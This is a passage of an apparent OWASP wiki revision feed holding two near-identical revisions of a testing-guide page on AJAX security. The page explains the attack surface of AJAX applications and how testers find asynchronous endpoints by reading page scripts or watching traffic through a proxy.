AJAX, an acronym for Asynchronous JavaScript and XML, is a web development technique used to create more responsive web applications.  It uses a combination of technologies in order to provide an experience that is more like using a desktop application.  This is accomplished by using the XMLHttpRequest object and JavaScript to make asynchronous requests to the web server, parsing the responses and then updating the page DOM HTML and CSS.&lt;br /&gt;
&lt;br /&gt;
Utilizing AJAX techniques can have tremendous usability benefits for web applications.  From a security standpoint, however, AJAX applications have a greater attack surface than normal web applications, and they are often developed with a focus on what can be done rather than what should be done.  Also, AJAX applications are more complicated because processing is done on both the client side and the server side.  The use of frameworks to hide this complexity can help to reduce development headaches, but can also result in situations where developers do not fully understand where the code they are writing will execute.  This can lead to situations where it is difficult to properly assess the risk associated with particular applications or features.&lt;br /&gt;
&lt;br /&gt;
AJAX applications are vulnerable to the full range of traditional web application vulnerabilities.  Insecure coding practices can lead to SQL injection vulnerabilities, misplaced trust in user-supplied input can lead to parameter tampering vulnerabilities, and a failure to require proper authentication and authorization can lead to problems with confidentiality and integrity.  In addition, AJAX applications can be vulnerable to new classes of attack such as Cross Site Request Forgery (XSRF).&lt;br /&gt;
&lt;br /&gt;
Testing AJAX applications can be challenging because developers are given a tremendous amount of freedom in how they communicate between the client and the server.  In traditional web applications, standard HTML forms submitted via GET or POST requests have an easy-to-understand format, and it is therefore easy to modify or create new well-formed requests.  AJAX applications often use different encoding or serialization schemes to submit POST data making it difficult for testing tools to reliably create automated test requests.  The use of web proxy tools is extremely valuable for observing behind-the-scenes asynchronous traffic and for ultimately modifying this traffic to properly test the AJAX-enabled application.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In this section we describe the following:&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[AJAX Vulnerabilities AoC |4.9.1 AJAX Vulnerabilities ]]&amp;lt;br&amp;gt;&lt;br /&gt;
[[AJAX How to test AoC|4.9.2 How to test AJAX ]]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Katie.mcdowell</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=AJAX_How_to_test_AoC&amp;diff=13709</id>
		<title>AJAX How to test AoC</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=AJAX_How_to_test_AoC&amp;diff=13709"/>
				<updated>2006-11-27T02:13:08Z</updated>
		
		<summary type="html">&lt;p&gt;Katie.mcdowell: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Because most attacks against AJAX applications are analogs of attacks against traditional web applications, testers should refer to other sections of the testing guide to look for specific parameter manipulations to use in order to discover vulnerabilities.  The challenge with AJAX-enabled applications is often finding the endpoints that are the targets for the asynchronous calls and then determining the proper format for requests.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Description of the Issue == &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Traditional web applications are fairly easy to discover in an automated fashion.  An application typically has one or more pages that are connected by HREFs or other links.  Interesting pages will have one or more HTML FORMs.  These forms will have one or more parameters.  By using simple spidering techniques such as looking for anchor (A) tags and HTML FORMs it should be possible to discover all pages, forms, and parameters in a traditional web application.  Requests made to this application follow a well-known and consistent format laid out in the HTTP specification.  GET requests have the format:&lt;br /&gt;
&lt;br /&gt;
http://server.com/directory/resource.cgi?param1=value1&amp;amp;key=value&lt;br /&gt;
&lt;br /&gt;
POST requests are sent to URLs in a similar fashion:&lt;br /&gt;
&lt;br /&gt;
http://server.com/directory/resource.cgi&lt;br /&gt;
&lt;br /&gt;
Data sent to POST requests is encoded in a similar format and included in the request after the headers:&lt;br /&gt;
&lt;br /&gt;
param1=value1&amp;amp;key=value&lt;br /&gt;
&lt;br /&gt;
Unfortunately, server-side AJAX endpoints are not as easy or consistent to discover, and the format of actual valid requests is left to the AJAX framework in use or the discretion of the developer.  Therefore to fully test AJAX-enabled applications, testers need to be aware of the frameworks in use, the AJAX endpoints that are available, and the required format for requests to be considered valid.  Once this understanding has been developed, standard parameter manipulation techniques using a proxy can be used to test for SQL injection and other flaws.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Black Box testing and example ==&lt;br /&gt;
'''Testing for AJAX Endpoints:''' &amp;lt;br&amp;gt;&lt;br /&gt;
Before an AJAX-enabled web application can be tested, the call endpoints for the asynchronous calls must be enumerated.  See [[Application_Discovery_AoC]] for more information about how traditional web applications are discovered.  For AJAX applications, there are two main approaches to determining call endpoints: parsing the HTML and JavaScript files and using a proxy to observe traffic.&lt;br /&gt;
&lt;br /&gt;
The advantage of parsing the HTML and JavaScript files in a web application is that it can provide a more comprehensive view of the server-side capabilities that can be accessed from the client side.  The drawback is that manually reviewing HTML and JavaScript content is tedious and, more importantly, the location and format of server-side URLs available to be accessed by AJAX calls are framework dependent.&lt;br /&gt;
&lt;br /&gt;
The tester should look through HTML and JavaScript files to find URLs of additional application surface exposure.  Searching for use of the XMLHttpRequest object in JavaScript code can help to focus these reviewing efforts.  Also, by knowing the names of included JavaScript files, the tester can determine which AJAX frameworks appear to be in use.  Once AJAX endpoints have been identified, the tester should further inspect the code to determine the format required of requests.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
[[Image:ExampleAtlasPage.PNG]]&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The advantage of using a proxy to observe traffic is that the actual requests demonstrate conclusively where the application is sending requests and what format those requests are in.  The disadvantage is that only the endpoints that the application actually makes calls to will be revealed.  The tester must fully exercise the remote application, and even then there could be additional call endpoints that are available but not actively in use.  In exercising the application, the proxy should observe traffic to both the user-viewable pages and the background asynchronous traffic to the AJAX endpoints.  Capturing this session traffic data allows the tester to determine all of the HTTP requests that are being made during the session as opposed to only looking at the user-viewable pages in the application.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
[[Image:ExampleAtlasRequest.jpg]]&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Result Expected:'''&amp;lt;br&amp;gt;&lt;br /&gt;
By enumerating the AJAX endpoints available in an application and determining the required request format, the tester can set the stage for further analysis of the application.  Once endpoints and proper request formats have been determined, the tester can use a web proxy and standard web application parameter manipulation techniques to look for SQL injection and parameter tampering attacks.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Gray Box testing and example == &lt;br /&gt;
'''Testing for AJAX Endpoints:'''&amp;lt;br&amp;gt;&lt;br /&gt;
Access to additional information about the application source code can greatly speed efforts to enumerate AJAX endpoints, and the knowledge of what frameworks are in use will help the tester to understand the required format for AJAX requests.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Result Expected:'''&amp;lt;br&amp;gt;&lt;br /&gt;
Knowledge of the frameworks being used and AJAX endpoints that are available helps the tester to focus his efforts and reduce the time required for discover and application footprinting.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
* ...&amp;lt;br&amp;gt;&lt;br /&gt;
'''Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
* The OWASP Sprajax tool [[Category:OWASP_Sprajax_Project]] can be used to spider web applications, identify AJAX frameworks in use, enumerate AJAX call endpoints, and fuzz those endpoints with framework-appropriate traffic.  At the current time, there is only support for the Microsoft Atlas framework (and detection for the Google Web Toolkit), but ongoing development should increase the utility of the tool.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Katie.mcdowell</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=AJAX_How_to_test_AoC&amp;diff=13708</id>
		<title>AJAX How to test AoC</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=AJAX_How_to_test_AoC&amp;diff=13708"/>
				<updated>2006-11-27T02:01:43Z</updated>
		
		<summary type="html">&lt;p&gt;Katie.mcdowell: /* Description of the Issue */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Because most attacks against AJAX applications are analogs of attacks against traditional web applications, testers should refer to other sections of the testing guide to look for specific parameter manipulations to use in order to discover vulnerabilities.  The challenge with AJAX-enabled applications is often finding the endpoints that are the targets for the asynchronous calls and then determining the proper format for requests.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Description of the Issue == &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Traditional web applications are fairly easy to discover in an automated fashion.  An application typically has one or more pages that are connected by HREFs or other links.  Interesting pages will have one or more HTML FORMs.  These forms will have one or more parameters.  By using simple spidering techniques such as looking for anchor (A) tags and HTML FORMs it should be possible to discover all pages, forms, and parameters in a traditional web application.  Requests made to this application follow a well-known and consistent format laid out in the HTTP specification.  GET requests have the format:&lt;br /&gt;
&lt;br /&gt;
http://server.com/directory/resource.cgi?param1=value1&amp;amp;key=value&lt;br /&gt;
&lt;br /&gt;
POST requests are sent to URLs in a similar fashion:&lt;br /&gt;
&lt;br /&gt;
http://server.com/directory/resource.cgi&lt;br /&gt;
&lt;br /&gt;
Data sent to POST requests is encoded in a similar format and included in the request after the headers:&lt;br /&gt;
&lt;br /&gt;
param1=value1&amp;amp;key=value&lt;br /&gt;
&lt;br /&gt;
Unfortunately, server-side AJAX endpoints are not as easy or consistent to discover, and the format of actual valid requests is left to the AJAX framework in use or the discretion of the developer.  Therefore to fully test AJAX-enabled applications, testers need to be aware of the frameworks in use, the AJAX endpoints that are available, and the required format for requests to be considered valid.  Once this understanding has been developed, standard parameter manipulation techniques using a proxy can be used to test for SQL injection and other flaws.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Black Box testing and example ==&lt;br /&gt;
'''Testing for AJAX Endpoints:''' &amp;lt;br&amp;gt;&lt;br /&gt;
Before an AJAX-enabled web application can be tested, the call endpoints for the asynchronous calls must be enumerated.  See [[Application_Discovery_AoC]] for more information about how traditional web applications are discovered.  For AJAX applications, there are two main approaches to determining call endpoints: parsing the HTML and JavaScript files and using a proxy to observe traffic.&lt;br /&gt;
&lt;br /&gt;
The advantage of parsing the HTML and JavaScript files in a web application is that it can provide a more comprehensive view of the server-side capabilities that can be accessed from the client side.  The drawback is that manually reviewing HTML and JavaScript content is tedious and more importantly the location and format of server-side URLs available to be accessed by AJAX calls is framework dependent.&lt;br /&gt;
&lt;br /&gt;
The tester should look through HTML and JavaScript files to find URLs of additional application surface exposure.  Searching for use of the XMLHttpRequest object in JavaScript code can help to focus these reviewing efforts.  Also, by knowing the names of included JavaScript files the tester can determine what AJAX frameworks appear to be in use.  Once AJAX endpoints have been identified, the tester should further inspect the code to determine the format required of requests.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
[[Image:ExampleAtlasPage.PNG]]&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The advantage of using a proxy to observe traffic is that the actual requests demonstrate conclusively where the application is sending requests and what format those requests are in.  The disadvantage is that only the endpoints that the application actually makes calls to will be revealed.  The tester must fully exercise the remote application and even then there could be additional call endpoints that are available but not actively in use.  In exercising the application, the proxy should observe traffic to both the user-viewable pages as well as the background asynchronous traffic to the AJAX endpoints.  Capturing this session traffic data allows the tester to determine all of the HTTP requests that are being made during the session as opposed to only looking at the user-viewable pages in the application.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
[[Image:ExampleAtlasRequest.jpg]]&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Result Expected:'''&amp;lt;br&amp;gt;&lt;br /&gt;
By enumerating the AJAX endpoints available in an application and determining the required request format the tester can set the stage for further analysis of the application.  Once endpoints and proper request formats have been determined, the tester can use a web proxy and standard web application parameter manipulation techniques to look for SQL injection and parameter tampering attacks.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Gray Box testing and example == &lt;br /&gt;
'''Testing for AJAX Endpoints:'''&amp;lt;br&amp;gt;&lt;br /&gt;
Access to additional information about the application source code can greatly speed efforts to enumerate AJAX endpoints and the knowledge of what frameworks are in use will help the tester to understand the required format for AJAX requests.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Result Expected:'''&amp;lt;br&amp;gt;&lt;br /&gt;
Knowledge of the frameworks being used and AJAX endpoints that are available helps the tester to focus their efforts and reduce the time required for discover and application footprinting.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
* ...&amp;lt;br&amp;gt;&lt;br /&gt;
'''Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
* The OWASP Sprajax tool [[Category:OWASP_Sprajax_Project]] can be used to spider web applications, identify AJAX frameworks in use, enumerate AJAX call endpoints and fuzz those endpoints with framework-appropriate traffic.  At the current time there is only support for the Microsoft Atlas framework (and detection for the Google Web Toolkit) but ongoing development should increase the utility of the tool.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Katie.mcdowell</name></author>	</entry>

	</feed>